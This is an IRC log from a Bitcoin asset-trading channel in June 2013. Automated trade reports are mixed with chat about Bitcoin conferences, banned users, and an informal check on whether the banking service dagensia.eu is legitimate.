[TAT.ASICMINER] 34 @ 0.025 = 0.85 BTC [+] Jun 08 00:15:55 the reputation has no causal relationship with conference attendance (other that that shady types like to show up) Jun 08 00:16:14 or do you predict erik will end up with broke rep too? Jun 08 00:16:30 im discussing the rpietillas of the world. Jun 08 00:16:41 ie, "o i shall organise a conference because supernode" Jun 08 00:17:24 this london thing seems more srs to me Jun 08 00:17:55 is this the thing which was "the first london conference" ? Jun 08 00:17:59 or is it a different london thing ? Jun 08 00:18:49 this one: http://btclondon.com no taaki around Jun 08 00:19:33 [BTCTC] [BTC-BOND] 100 @ 0.009831 = 0.9831 BTC [-] Jun 08 00:20:04 [BTCTC] [BTC-BOND] 1 @ 0.00983 BTC [-] Jun 08 00:20:38 [BTCTC] [BTC-BOND] 5 @ 0.00982 = 0.0491 BTC [-] Jun 08 00:21:11 [BTCTC] [BTC-BOND] 15 @ 0.00981 = 0.1472 BTC [-] Jun 08 00:21:14 [BTCTC] [BTC-BOND] 33 @ 0.00981 = 0.3237 BTC [-] Jun 08 00:21:49 [BTCTC] [BTC-BOND] 10 @ 0.00978 = 0.0978 BTC [-] Jun 08 00:22:26 [MPEX] [S.MPOE] 584 @ 0.00072633 = 0.4242 BTC [-] Jun 08 00:22:28 [MPEX] [S.MPOE] 7000 @ 0.00072609 = 5.0826 BTC [-] Jun 08 00:22:50 [BTCTC] [BTC-BOND] 64 @ 0.00977 = 0.6253 BTC [-] Jun 08 00:23:51 yaya. Jun 08 00:23:56 organised by coinsomething Jun 08 00:28:34 on one side i know it will be 99% bs. but also it seems to me i will have to solve my difficulties and occassionally show. Jun 08 00:28:53 because i know few coinbr users that started using it cuz they met me Jun 08 00:29:05 and i didn't seemed as scammer to them :D Jun 08 00:29:36 (lol maybe that's why scammers love to present on conferences) Jun 08 00:31:42 [HAVELOCK] [ASICM] 36 @ 0.024979 = 0.8992 BTC [+] Jun 08 00:32:07 [HAVELOCK] [ASICM] 23 @ 0.02497999 = 0.5745 BTC [+] Jun 08 00:32:15 another subreddit: http://www.reddit.com/r/BitcoinMarkets Jun 08 00:32:28 this one for btcusd daytraders, seems Jun 08 00:33:51 jurov so go. Jun 08 00:35:10 jurov -assets will support you with a mini projector Jun 08 00:35:22 so you can shine it in their faces Jun 08 00:35:23 the idea isn't "omg don't go!!!" Jun 08 00:35:25 lol Jun 08 00:35:37 and a mini bike -, so you can show up in style Jun 08 00:35:53 i prefer lollerskates Jun 08 00:35:58 the idea is wtf is wrong with people, they don't have a business but imagine organising conferences is the solution, they don't have a clue (as to the history, for instance) but they imagine being loud is the solution etc Jun 08 00:36:00 mini bikes are not in fashion anymore Jun 08 00:36:42 600hp bike is the way to go Jun 08 00:36:49 mircea_popescu they would disagree :) Jun 08 00:37:00 to put it this way : london is london just like the corner bar is the corner bar. Jun 08 00:37:07 people will go to london just like people will be drinking in the bar Jun 08 00:37:11 wait rent a white Bentley and put silver all over you Jun 08 00:37:18 oh wait- someone already did that Jun 08 00:37:20 this irrespective of some kid in the train station/lobby distributing leaflets. Jun 08 00:38:31 ever seen retarded kids in impoverished countries taking their pic against some above average parked car that happened in their way ? that, in a word, is bitcoin conference organising. Jun 08 00:38:34 [BTCTC] [B.YABMC] 1 @ 0.015559 BTC [+] Jun 08 00:40:55 [HAVELOCK] [ASICM] 350 @ 0.02496 = 8.736 BTC [-] Jun 08 00:41:43 why isnt tux there Jun 08 00:42:08 is he afraid to go out of his japan now Jun 08 00:42:10 probably because it isn't legal Jun 08 00:43:14 [HAVELOCK] [HIM] 4 @ 0.2906 = 1.1624 BTC [-] Jun 08 00:43:23 conferences can be illegal? Jun 08 00:43:52 he's afraid to end up like nefario Jun 08 00:44:10 did they beat nefario at the conf? Jun 08 00:44:16 beat up* Jun 08 00:44:25 [HAVELOCK] [HIM] 2 @ 0.2905 = 0.581 BTC [-] Jun 08 00:44:33 no he discovered how illegal he is right *after* the conf Jun 08 00:44:41 ah Jun 08 00:44:43 that. Jun 08 00:44:48 [HAVELOCK] [HIM] 50 @ 0.2902 = 14.51 BTC [-] Jun 08 00:44:59 [HAVELOCK] [HIM] 16 @ 0.29 = 4.64 BTC [-] Jun 08 00:45:35 [HAVELOCK] [HIM] 1 @ 0.28312 BTC [-] Jun 08 00:45:38 [HAVELOCK] [ASICM] 263 @ 0.02496 = 6.5645 BTC [-] Jun 08 00:45:43 [HAVELOCK] [HIM] 10 @ 0.28311 = 2.8311 BTC [-] Jun 08 00:45:46 [HAVELOCK] [HIM] 2 @ 0.28222 = 0.5644 BTC [-] Jun 08 00:45:51 [HAVELOCK] [HIM] 2 @ 0.281 = 0.562 BTC [-] Jun 08 00:46:04 [HAVELOCK] [HIM] 8 @ 0.28000049 = 2.24 BTC [-] Jun 08 00:48:28 FabianB_ tis a joke. tux isn't on mpex "because illegal" Jun 08 00:48:41 two weeks later, tux is wanted by every agency in teh us. Jun 08 01:06:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.02494 = 0.2494 BTC [-] Jun 08 01:21:34 [BTCTC] [ASICMINER-PT] 1 @ 2.4908 BTC [+] Jun 08 01:21:36 [BTCTC] [ASICMINER-PT] 5 @ 2.4909 = 12.4545 BTC [+] Jun 08 01:21:40 [BTCTC] [ASICMINER-PT] 1 @ 2.491 BTC [+] Jun 08 01:21:43 [BTCTC] [ASICMINER-PT] 3 @ 2.492 = 7.476 BTC [+] Jun 08 01:25:03 [HAVELOCK] [SDICE] 4 @ 0.2008 = 0.8032 BTC [-] Jun 08 01:27:50 [HAVELOCK] [ASICM] 24 @ 0.0247 = 0.5928 BTC [-] Jun 08 01:30:23 [MPEX] [S.MPOE] 4900 @ 0.00072609 = 3.5578 BTC [-] Jun 08 01:30:25 [MPEX] [S.MPOE] 4321 @ 0.00072497 = 3.1326 BTC [-] Jun 08 01:30:33 [HAVELOCK] [ASICM] 9 @ 0.02495 = 0.2246 BTC [+] Jun 08 01:30:35 [MPEX] [S.MPOE] 8347 @ 0.00072496 = 6.0512 BTC [-] Jun 08 01:30:35 [MPEX] [S.MPOE] 6302 @ 0.00072482 = 4.5678 BTC [-] Jun 08 01:30:38 [MPEX] [S.MPOE] 8700 @ 0.0007238 = 6.2971 BTC [-] Jun 08 01:30:40 [MPEX] [S.MPOE] 6030 @ 0.00072336 = 4.3619 BTC [-] Jun 08 01:33:52 [MPEX] [S.MPOE] 987 @ 0.00072828 = 0.7188 BTC [+] Jun 08 01:33:54 [MPEX] [S.MPOE] 2500 @ 0.00072829 = 1.8207 BTC [+] Jun 08 01:34:04 [MPEX] [S.MPOE] 6563 @ 0.00072925 = 4.7861 BTC [+] Jun 08 01:40:19 [BTCTC] [PAJKA.BOND] 1 @ 0.070001 BTC [+] Jun 08 01:40:23 [BTCTC] [PAJKA.BOND] 1 @ 0.07 BTC [-] Jun 08 01:45:24 [BTCTC] [COGNITIVE] 2 @ 0.285 = 0.57 BTC [+] Jun 08 01:46:24 [BTCTC] [BASIC-MINING] 1 @ 0.71 BTC [+] Jun 08 01:57:39 hey do we need to do something special for new accounts to post on the forums? Jun 08 01:58:05 yeah you need to make n posts and wait n time Jun 08 01:58:19 in the newbie section Jun 08 01:58:44 thats lame Jun 08 01:58:58 even reddit isnt that lams Jun 08 01:59:05 <[\\\]> you'll be fine Jun 08 01:59:08 i cant respond to mpoe-pr Jun 08 01:59:13 but oh well Jun 08 01:59:19 <[\\\]> its highly doubtful you had anything worthwhile to contribute anyway Jun 08 01:59:35 nah I somewhat do based on what she said about s.mg Jun 08 01:59:52 <[\\\]> there's basically two kinds of posts on that forum Jun 08 01:59:57 <[\\\]> the first being troll posts Jun 08 02:00:07 <[\\\]> the other is the response to the frist Jun 08 02:00:09 <[\\\]> first* Jun 08 02:02:07 Is mircea_popescu even still around? Jun 08 02:03:51 <[\\\]> I think he gets out of jail tomorrow Jun 08 02:04:01 <[\\\]> 'tomorrow' being Monday his time. Jun 08 02:05:22 ;;seen bowjob Jun 08 02:05:23 bowjob was last seen in #bitcoin-assets 6 weeks, 3 days, 23 hours, 58 minutes, and 39 seconds ago: lol Jun 08 02:05:32 Did that guy like..retire? Jun 08 02:06:34 ;;seen smickles Jun 08 02:06:34 smickles was last seen in #bitcoin-assets 9 weeks, 1 day, 7 hours, 24 minutes, and 5 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Jun 08 02:06:38 what about that guy? Jun 08 02:06:40 lol Jun 08 02:09:18 [BTCTC] [ASICMINER-PT] 1 @ 2.4929 BTC [+] Jun 08 02:09:43 [BTCTC] [BTC-BOND] 10 @ 0.00978 = 0.0978 BTC [+] Jun 08 02:10:06 haven't seen him he disappeared Jun 08 02:10:33 [BTCTC] [ASICMINER-PT] 3 @ 2.49294 = 7.4788 BTC [+] Jun 08 02:10:58 [BTCTC] [BTC-BOND] 22 @ 0.00977 = 0.2149 BTC [-] Jun 08 02:11:24 lol i was wondering about tiberiusiv too i see he's banned..i ran into him on another channel smearing his shit around Jun 08 02:15:20 [HAVELOCK] [ASICM] 658 @ 0.02495 = 16.4171 BTC [+] Jun 08 02:16:34 kako banned him? Jun 08 02:16:35 REALLY Jun 08 02:16:39 kako never bans anyone Jun 08 02:16:49 kakobrekla: why'd you ban tiberiusiv Jun 08 02:16:53 ;;seen tiberiusiv Jun 08 02:16:53 tiberiusiv was last seen in #bitcoin-assets 4 weeks, 3 days, 23 hours, 47 minutes, and 13 seconds ago: you cant read english paragraphs Jun 08 02:18:54 he selfbanned himself Jun 08 02:24:01 [MPEX] [S.MPOE] 5892 @ 0.00072352 = 4.263 BTC [-] Jun 08 02:25:25 what dat mean? care to elaborate mr. kakobrekla ? Jun 08 02:27:20 no spam Jun 08 02:40:59 kakobrekla: what was he spamming? Jun 08 02:41:01 i feel so out of the loop Jun 08 02:41:22 HAH he did Jun 08 02:41:37 look thestringpuller, pm him if you miss him Jun 08 02:45:34 [BTCTC] [CRYPTO-TRADE] 2 @ 0.182 = 0.364 BTC [+] Jun 08 02:46:02 [BTCTC] [CRYPTO-TRADE] 1 @ 0.181 BTC [-] Jun 08 02:48:43 [HAVELOCK] [ASICM] 4 @ 0.02495 = 0.0998 BTC [+] Jun 08 02:50:31 oh Jun 08 02:50:41 it was way more than that thingy Jun 08 02:51:22 [BTCTC] [TAT.ASICMINER] 40 @ 0.02483 = 0.9932 BTC [-] Jun 08 02:51:47 [BTCTC] [TAT.ASICMINER] 8 @ 0.02482 = 0.1986 BTC [-] Jun 08 02:51:49 [BTCTC] [TAT.ASICMINER] 70 @ 0.02482 = 1.7374 BTC [-] Jun 08 02:52:12 [BTCTC] [CRYPTO-TRADE] 1 @ 0.177251 BTC [-] Jun 08 02:52:36 [BTCTC] [CRYPTO-TRADE] 1 @ 0.177251 BTC [-] Jun 08 02:52:42 heh Jun 08 02:53:13 [BTCTC] [ASICMINER-PT] 1 @ 2.49294 BTC [+] Jun 08 02:58:18 [BTCTC] [ASICMINER-PT] 2 @ 2.49294 = 4.9859 BTC [+] Jun 08 02:59:06 [BTCTC] [TAT.ASICMINER] 10 @ 0.024803 = 0.248 BTC [-] Jun 08 02:59:26 [BTCTC] [BASIC-MINING] 1 @ 0.71 BTC [+] Jun 08 03:01:18 [HAVELOCK] [HIM] 61 @ 0.2997 = 18.2817 BTC [+] Jun 08 03:01:20 [HAVELOCK] [HIM] 23 @ 0.2998 = 6.8954 BTC [+] Jun 08 03:07:03 thestringpuller sup ? Jun 08 03:07:47 [MPEX] [S.MPOE] 2620 @ 0.00072336 = 1.8952 BTC [-] Jun 08 03:07:48 [MPEX] [S.MPOE] 4321 @ 0.0007231 = 3.1245 BTC [-] Jun 08 03:07:50 [MPEX] [S.MPOE] 1509 @ 0.00072309 = 1.0911 BTC [-] Jun 08 03:11:15 [HAVELOCK] [ASICM] 45 @ 0.02495 = 1.1228 BTC [+] Jun 08 03:17:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.02494 BTC [+] Jun 08 03:17:14 [BTCTC] [TAT.ASICMINER] 8 @ 0.025 = 0.2 BTC [+] Jun 08 03:25:01 mircea_popescu: I'm gonna let MPOE-PR respond to this inquiry this time. Jun 08 03:30:35 lolwut Jun 08 03:31:37 https://bitcointalk.org/index.php?topic=224745.0;all Jun 08 03:31:42 this is the best thing i read all week. Jun 08 03:31:55 i hope somebody hires these people to build a plane Jun 08 03:38:10 [HAVELOCK] [HIM] 10 @ 0.2998 = 2.998 BTC [+] Jun 08 03:46:48 [HAVELOCK] [ASICM] 1 @ 0.02495 BTC [+] Jun 08 04:05:14 Everybody is invited to #bitcoin-anal for free beer fun and prizes Jun 08 04:05:42 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [-] Jun 08 04:10:17 [HAVELOCK] [ASICM] 1 @ 0.02495 BTC [+] Jun 08 04:21:39 [HAVELOCK] [ASICM] 26 @ 0.02467001 = 0.6414 BTC [-] Jun 08 04:22:07 [HAVELOCK] [ASICM] 34 @ 0.02467 = 0.8388 BTC [-] Jun 08 04:22:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.02481 = 0.0992 BTC [-] Jun 08 04:22:17 [BTCTC] [TAT.ASICMINER] 28 @ 0.02481 = 0.6947 BTC [-] Jun 08 04:22:29 [HAVELOCK] [ASICM] 108 @ 0.024662 = 2.6635 BTC [-] Jun 08 04:29:18 [HAVELOCK] [SDICE] 8 @ 0.2032 = 1.6256 BTC [+] Jun 08 04:29:20 [HAVELOCK] [SDICE] 7 @ 0.2031 = 1.4217 BTC [-] Jun 08 04:29:21 [HAVELOCK] [SDICE] 20 @ 0.2029 = 4.058 BTC [-] Jun 08 04:29:22 [HAVELOCK] [SDICE] 1 @ 0.2019 BTC [-] Jun 08 04:29:23 [HAVELOCK] [SDICE] 14 @ 0.2005 = 2.807 BTC [-] Jun 08 04:29:23 [HAVELOCK] [SDICE] 10 @ 0.20000001 = 2 BTC [-] Jun 08 04:29:25 [HAVELOCK] [SDICE] 240 @ 0.2 = 48 BTC [-] Jun 08 04:31:10 [HAVELOCK] [ASICM] 12 @ 0.024662 = 0.2959 BTC [-] Jun 08 04:31:21 [HAVELOCK] [ASICM] 21 @ 0.02495 = 0.524 BTC [+] Jun 08 04:31:23 [HAVELOCK] [ASICM] 20 @ 0.02466102 = 0.4932 BTC [-] Jun 08 04:42:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.024999 BTC [+] Jun 08 04:54:38 [BTCTC] [GSDPT] 1 @ 0.002811 BTC [-] Jun 08 04:55:04 [BTCTC] [GSDPT] 2 @ 0.002809 = 0.0056 BTC [-] Jun 08 04:56:36 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [-] Jun 08 05:04:57 [HAVELOCK] [ASICM] 26 @ 0.02494999 = 0.6487 BTC [+] Jun 08 05:10:02 [HAVELOCK] [ASICM] 294 @ 0.02495 = 7.3353 BTC [+] Jun 08 05:10:04 [HAVELOCK] [ASICM] 300 @ 0.02496 = 7.488 BTC [+] Jun 08 05:21:26 [BTCTC] [ASICMINER-PT] 1 @ 2.4929 BTC [+] Jun 08 05:22:59 [BTCTC] [ASICMINER-PT] 5 @ 2.49294 = 12.4647 BTC [+] Jun 08 05:30:10 [BTCTC] [BTC-BOND] 24 @ 0.00977 = 0.2345 BTC [-] Jun 08 05:31:31 [BTCTC] [B.YABMC] 15 @ 0.015559 = 0.2334 BTC [+] Jun 08 05:31:43 [HAVELOCK] [ASICM] 80 @ 0.02496 = 1.9968 BTC [+] Jun 08 05:39:37 [BTCTC] [TAT.ASICMINER] 27 @ 0.024999 = 0.675 BTC [+] Jun 08 05:39:50 [BTCTC] [ASICMINER-PT] 2 @ 2.49294 = 4.9859 BTC [+] Jun 08 05:43:45 [BTCTC] [TAT.ASICMINER] 93 @ 0.025 = 2.325 BTC [+] Jun 08 05:43:47 [BTCTC] [TAT.ASICMINER] 11 @ 0.025 = 0.275 BTC [+] Jun 08 05:59:01 [HAVELOCK] [SDICE] 12 @ 0.222 = 2.664 BTC [+] Jun 08 06:02:10 [BTCTC] [S.MPOE-PT] 8 @ 0.0007 = 0.0056 BTC [-] Jun 08 06:05:15 [BTCTC] [BTC-BOND] 12 @ 0.00991 = 0.1189 BTC [+] Jun 08 06:07:05 Shoot, fat-finger mistake :( just meant to put in an order for .00978, had an extra 9 in there so That was me buying a second ago Jun 08 06:08:40 [MPEX] [S.MPOE] 958 @ 0.00072352 = 0.6931 BTC [+] Jun 08 06:08:42 [MPEX] [S.MPOE] 6142 @ 0.0007253 = 4.4548 BTC [+] Jun 08 06:10:52 [BTCTC] [COGNITIVE] 10 @ 0.285 = 2.85 BTC [+] Jun 08 06:32:47 [MPEX] [S.MPOE] 4321 @ 0.00072311 = 3.1246 BTC [-] Jun 08 06:32:58 [MPEX] [S.MPOE] 779 @ 0.00072309 = 0.5633 BTC [-] Jun 08 06:37:45 Serbia, NOT Somalia, East Timor, Sao Tome and Principe 11% inflation. Would BTC be an alternative that is not illegal because it undermines their currency? Jun 08 06:38:31 [HAVELOCK] [HIM] 6 @ 0.2998 = 1.7988 BTC [+] Jun 08 06:38:47 stfu assbot I'm sick of you Jun 08 06:45:50 [BTCTC] [BTC-BOND] 23 @ 0.00991 = 0.2279 BTC [+] Jun 08 07:14:06 [BTCTC] [B.YABMC] 1 @ 0.015559 BTC [+] Jun 08 07:14:48 [BTCTC] [GSDPT] 1 @ 0.002999 BTC [+] Jun 08 07:15:02 [BTCTC] [GSDPT] 1 @ 0.003 BTC [+] Jun 08 07:15:32 [BTCTC] [BITVPS] 1 @ 0.000753 BTC [+] Jun 08 07:26:07 [BTCTC] [PAJKA.BOND] 1 @ 0.079657 BTC [+] Jun 08 07:26:27 [BTCTC] [ASICMINER-PT] 2 @ 2.4925 = 4.985 BTC [-] Jun 08 07:27:42 [BTCTC] [ASICMINER-PT] 4 @ 2.4925 = 9.97 BTC [-] Jun 08 07:28:36 [BTCTC] [ASICMINER-PT] 3 @ 2.4925 = 7.4775 BTC [-] Jun 08 07:30:25 [BTCTC] [TAT.ASICMINER] 39 @ 0.024811 = 0.9676 BTC [-] Jun 08 07:30:54 [BTCTC] [ASICMINER-PT] 1 @ 2.4925 BTC [-] **** BEGIN LOGGING AT Sat Jun 8 20:18:06 2013 Jun 08 20:18:37 jurov not a bad thing. Jun 08 20:18:49 [BTCTC] [TAT.ASICMINER] 4 @ 0.02499 = 0.1 BTC [-] Jun 08 20:19:15 yes. except no one in #bitcoin.cz knows anything about them Jun 08 20:20:09 teh site itself doesn't strike me as the actual thing, but hey. Jun 08 20:20:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.02499 = 0.075 BTC [-] Jun 08 20:21:02 [BTCTC] [BASIC-MINING] 1 @ 0.699 BTC [-] Jun 08 20:21:38 the user interface is actually on https://banking.dagensia.eu/ Jun 08 20:22:19 still figuring out if anything can be tried without sending papers first. Jun 08 20:22:39 as full KYC is required. Jun 08 20:22:50 what i mean is that their aml page looks more like a half-assed copy/paste from disparate sources than an actual item. Jun 08 20:23:36 [BTCTC] [TAT.ASICMINER] 12 @ 0.02499 = 0.2999 BTC [-] Jun 08 20:27:19 [BTCTC] [B.YABMC] 2 @ 0.0131 = 0.0262 BTC [-] Jun 08 20:27:21 [BTCTC] [B.YABMC] 49 @ 0.013 = 0.637 BTC [-] Jun 08 20:27:24 [BTCTC] [B.YABMC] 3 @ 0.01289 = 0.0387 BTC [-] Jun 08 20:27:26 [BTCTC] [B.YABMC] 10 @ 0.01201 = 0.1201 BTC [-] Jun 08 20:27:30 [BTCTC] [B.YABMC] 14 @ 0.012 = 0.168 BTC [-] Jun 08 20:27:33 [BTCTC] [B.YABMC] 22 @ 0.011 = 0.242 BTC [-] Jun 08 20:27:37 https://bitcointalk.org/index.php?topic=228108.msg2411233#msg2411233 lol Jun 08 20:29:26 lol Jun 08 20:29:57 Chaaaang-Noi!*@* added to ignore list. Jun 08 20:32:37 [BTCTC] [PAJKA.BOND] 2 @ 0.089 = 0.178 BTC [+] Jun 08 20:32:39 [BTCTC] [PAJKA.BOND] 5 @ 0.0899 = 0.4495 BTC [+] Jun 08 20:33:29 [BTCTC] [PAJKA.BOND] 8 @ 0.09 = 0.72 BTC [+] Jun 08 20:37:15 [BTCTC] [PAJKA.BOND] 1 @ 0.08 BTC [-] Jun 08 20:37:33 [HAVELOCK] [ASICM] 165 @ 0.02527 = 4.1696 BTC [-] Jun 08 20:37:40 pigeons https://bitcointalk.org/index.php?topic=228237.0 is that you ? Jun 08 20:38:07 [BTCTC] [ASICMINER-PT] 2 @ 2.49875 = 4.9975 BTC [+] Jun 08 20:39:18 [HAVELOCK] [ASICM] 1 @ 0.02509 BTC [-] Jun 08 20:39:20 [HAVELOCK] [ASICM] 2 @ 0.02508 = 0.0502 BTC [-] Jun 08 20:39:21 [HAVELOCK] [ASICM] 40 @ 0.02507 = 1.0028 BTC [-] Jun 08 20:39:22 [HAVELOCK] [ASICM] 80 @ 0.025 = 2 BTC [-] Jun 08 20:39:23 [HAVELOCK] [ASICM] 2977 @ 0.025 = 74.425 BTC [-] Jun 08 20:51:08 mircea_popescu: not me Jun 08 20:51:19 a ok Jun 08 20:51:36 guy is on my ignore though Jun 08 21:00:45 yeah i definately can't see that ;) Jun 08 21:02:09 [HAVELOCK] [ASICM] 23 @ 0.025 = 0.575 BTC [-] Jun 08 21:03:05 [BTCTC] [TAT.ASICMINER] 4 @ 0.02499 = 0.1 BTC [-] Jun 08 21:13:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [+] Jun 08 21:18:55 [BTCTC] [GOLD] 1 @ 0.1237 BTC [+] Jun 08 21:21:52 [BTCTC] [BTC-TRADING-PT] 1 @ 0.319998 BTC [+] Jun 08 21:22:02 [HAVELOCK] [ASICM] 938 @ 0.025 = 23.45 BTC [-] Jun 08 21:23:59 [BTCTC] [ASICMINER-PT] 1 @ 2.49875 BTC [+] Jun 08 21:25:29 [BTCTC] [TAT.ASICMINER] 7 @ 0.024999 = 0.175 BTC [-] Jun 08 21:42:54 [HAVELOCK] [ASICM] 379 @ 0.025 = 9.475 BTC [-] Jun 08 21:49:52 [MPEX] [O.USD.C113T] 83 @ 0.28882993 = 23.9729 BTC Jun 08 21:51:13 $avg Jun 08 21:51:19 [BTCTC] [BTC-BOND] 100 @ 0.009812 = 0.9812 BTC [-] Jun 08 21:52:03 [BTCTC] [BTC-BOND] 100 @ 0.009811 = 0.9811 BTC [-] Jun 08 21:52:06 no mpexbot again.. who's the master? kakobrekla? Jun 08 21:52:13 nope Jun 08 21:52:21 smickles iirc Jun 08 21:52:24 no? Jun 08 21:52:44 [BTCTC] [BTC-BOND] 1 @ 0.00981 BTC [-] Jun 08 21:53:18 [BTCTC] [BTC-BOND] 10 @ 0.00978 = 0.0978 BTC [-] Jun 08 21:55:17 [BTCTC] [BTC-BOND] 72 @ 0.00977 = 0.7034 BTC [-] Jun 08 21:55:57 [HAVELOCK] [VTX] 1 @ 0.41800001 BTC [-] Jun 08 21:56:35 [HAVELOCK] [SDICE] 7 @ 0.219 = 1.533 BTC [-] Jun 08 21:57:33 [HAVELOCK] [VTX] 1 @ 0.418 BTC [-] Jun 08 22:01:00 kakobrekla: ya Jun 08 22:04:46 J kenna said "we are not kids anymore" mircea_popescu. Jun 08 22:05:29 [BTCTC] [PAJKA.BOND] 4 @ 0.09 = 0.36 BTC [+] Jun 08 22:23:32 [MPEX] [S.MPOE] 10000 @ 0.000726 = 7.26 BTC [+] Jun 08 22:23:34 [MPEX] [S.MPOE] 2219 @ 0.00072644 = 1.612 BTC [+] Jun 08 22:24:26 [BTCTC] [ASICMINER-PT] 2 @ 2.49875 = 4.9975 BTC [+] Jun 08 22:24:31 [BTCTC] [ASICMINER-PT] 2 @ 2.498765 = 4.9975 BTC [+] Jun 08 22:24:33 [BTCTC] [ASICMINER-PT] 2 @ 2.499 = 4.998 BTC [+] Jun 08 22:24:37 [BTCTC] [ASICMINER-PT] 4 @ 2.49995 = 9.9998 BTC [+] Jun 08 22:43:36 [BTCTC] [BASIC-MINING] 1 @ 0.699 BTC [-] Jun 08 22:44:44 [BTCTC] [TAT.ASICMINER] 12 @ 0.024999 = 0.3 BTC [-] Jun 08 22:44:50 kakobrekla orly. Jun 08 22:45:05 jurov i guess that's why there's two. Jun 08 22:47:38 three bots with three pimps Jun 08 22:52:32 [MPEX] [S.MPOE] 10523 @ 0.00072644 = 7.6443 BTC [+] Jun 08 23:08:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [-] Jun 08 23:08:43 [BTCTC] [B.YABMC] 3 @ 0.01349 = 0.0405 BTC [+] Jun 08 23:09:22 ok this video with captions is prolly the funniest thing i ever saw Jun 08 23:09:23 http://shrani.si/f/3L/yu/FgzVwTh/kenna.png Jun 08 23:09:45 [BTCTC] [TAT.ASICMINER] 22 @ 0.02489 = 0.5476 BTC [-] Jun 08 23:10:20 LOL Jun 08 23:13:48 what srsly ? Jun 08 23:14:55 http://shrani.si/f/h/ZU/p4m2Ijc/clintons.png Jun 08 23:18:02 [HAVELOCK] [ASICM] 284 @ 0.02527 = 7.1767 BTC [+] Jun 08 23:19:48 http://shrani.si/f/1Q/GT/3mfUcxgV/birthcontrol.jpg Jun 08 23:22:50 [BTCTC] [ASICMINER-PT] 1 @ 2.49995 BTC [+] Jun 08 23:23:12 well, if you have to rely on the subs then it's like http://i.imgur.com/xzGrVLH.png Jun 08 23:28:25 http://shrani.si/f/M/k7/Tt31Fwe/nomistake.png Jun 08 23:32:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.02495 BTC [+] Jun 08 23:33:10 [BTCTC] [ASICMINER-PT] 1 @ 2.49999 BTC [+] Jun 08 23:35:02 anyone knows who's behind http://dagensia.eu ? Jun 08 23:35:39 don't know. already asked earlier. Jun 08 23:36:34 [MPEX] [S.MPOE] 2100 @ 0.00072644 = 1.5255 BTC [+] Jun 08 23:36:42 just got idea to look into register Jun 08 23:37:28 hah, it's registered as reality company Jun 08 23:37:46 then financial services Jun 08 23:38:29 [HAVELOCK] [ASICM] 150 @ 0.02500031 = 3.75 BTC [-] Jun 08 23:38:29 [HAVELOCK] [ASICM] 43 @ 0.0250003 = 1.075 BTC [-] Jun 08 23:38:31 [HAVELOCK] [ASICM] 94 @ 0.0250001 = 2.35 BTC [-] Jun 08 23:39:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.024999 BTC [+] Jun 08 23:40:51 [BTCTC] [TAT.ASICMINER] 8 @ 0.024999 = 0.2 BTC [+] Jun 08 23:42:51 Love it! You google Jared Kenna and the 3rd link has Mircea Popescu's article Jun 08 23:44:31 mircea_popescu http://shrani.si/f/1/dW/22HJAlkM/kenna.png Jun 08 23:44:58 [BTCTC] [ASICMINER-PT] 22 @ 2.49999 = 54.9998 BTC [+] Jun 08 23:46:01 [BTCTC] [TAT.ASICMINER] 11 @ 0.024999 = 0.275 BTC [+] Jun 08 23:47:04 http://www.tubechop.com/watch/1244804 Jun 08 23:47:07 [BTCTC] [TAT.ASICMINER] 17 @ 0.025 = 0.425 BTC [+] Jun 08 23:47:10 there ya go Jun 08 23:55:40 [HAVELOCK] [ASICM] 17 @ 0.025279 = 0.4297 BTC [+] Jun 08 23:57:50 jurov: what's a reality company? Jun 08 23:58:06 something like reality tv? Jun 08 23:58:06 real estate Jun 08 23:58:12 sry my engrish Jun 08 23:58:12 ah, lol Jun 08 23:58:18 [HAVELOCK] [ASICM] 26 @ 0.025279 = 0.6573 BTC [+] Jun 08 23:58:19 [HAVELOCK] [ASICM] 144 @ 0.02528 = 3.6403 BTC [+] Jun 08 23:59:17 interesting, that doesn't sound like they really have a finance license Jun 08 23:59:38 that was only trade register Jun 08 23:59:47 [BTCTC] [ASICMINER-PT] 1 @ 2.49999 BTC [+] Jun 09 00:00:25 [HAVELOCK] [ASICM] 6 @ 0.02528 = 0.1517 BTC [+] Jun 09 00:00:26 [HAVELOCK] [ASICM] 21 @ 0.02529 = 0.5311 BTC [+] Jun 09 00:01:31 the finance license is here: https://apl.cnb.cz/apljerrsdad/JERRS.WEB10.VIZITKA?p_lang=en&p_SEQ_ID=1040913&p_VER_ID=1000&p_DATUM=08.06.2013&p_ROL_KOD= Jun 09 00:03:04 to me looks like they were in e-gold business since 2011 and recently moved into bitcoin Jun 09 00:03:09 weird the ssl cert is not valid or can't be verified by my browser, but looks legit so far Jun 09 00:04:09 here the institutions have weird ideas about ssl certs sometimes Jun 09 00:04:51 or at least tend to mismatchhostnames Jun 09 00:05:43 [BTCTC] [TAT.ASICMINER] 22 @ 0.025 = 0.55 BTC [+] Jun 09 00:06:31 dunno why ppl use ssl at all if not properly Jun 09 00:06:42 lmao Jun 09 00:07:16 jurov im printing that Jun 09 00:07:19 improve office morale. Jun 09 00:08:30 [BTCTC] [B.YABMC] 1 @ 0.01349 BTC [+] Jun 09 00:09:12 jurov: did you see that in -otc-eu? dagensia being somehow related with prev mtgox owner? Jun 09 00:09:49 [BTCTC] [TAT.ASICMINER] 23 @ 0.025 = 0.575 BTC [+] Jun 09 00:10:43 yes they publicly admit they fucntioned under ecardone.com and it was seized Jun 09 00:11:21 hm. if their license is from 2010, why do they expect to not be seized again? Jun 09 00:11:22 but don't know anything about how it was related to lr/mtgox, never seen that before Jun 09 00:11:52 cause us won't seize .eu domain? Jun 09 00:12:11 [HAVELOCK] [ASICM] 43 @ 0.02529 = 1.0875 BTC [+] Jun 09 00:12:19 hmm.. maybe Jun 09 00:12:50 [BTCTC] [BTC-BOND] 80 @ 0.009996 = 0.7997 BTC [+] Jun 09 00:13:49 their czech/eu license seems intact so far Jun 09 00:14:36 afaik eu is not involved with lr nor mtgox at all Jun 09 00:30:11 [MPEX] [S.MPOE] 2050 @ 0.00072644 = 1.4892 BTC [+] Jun 09 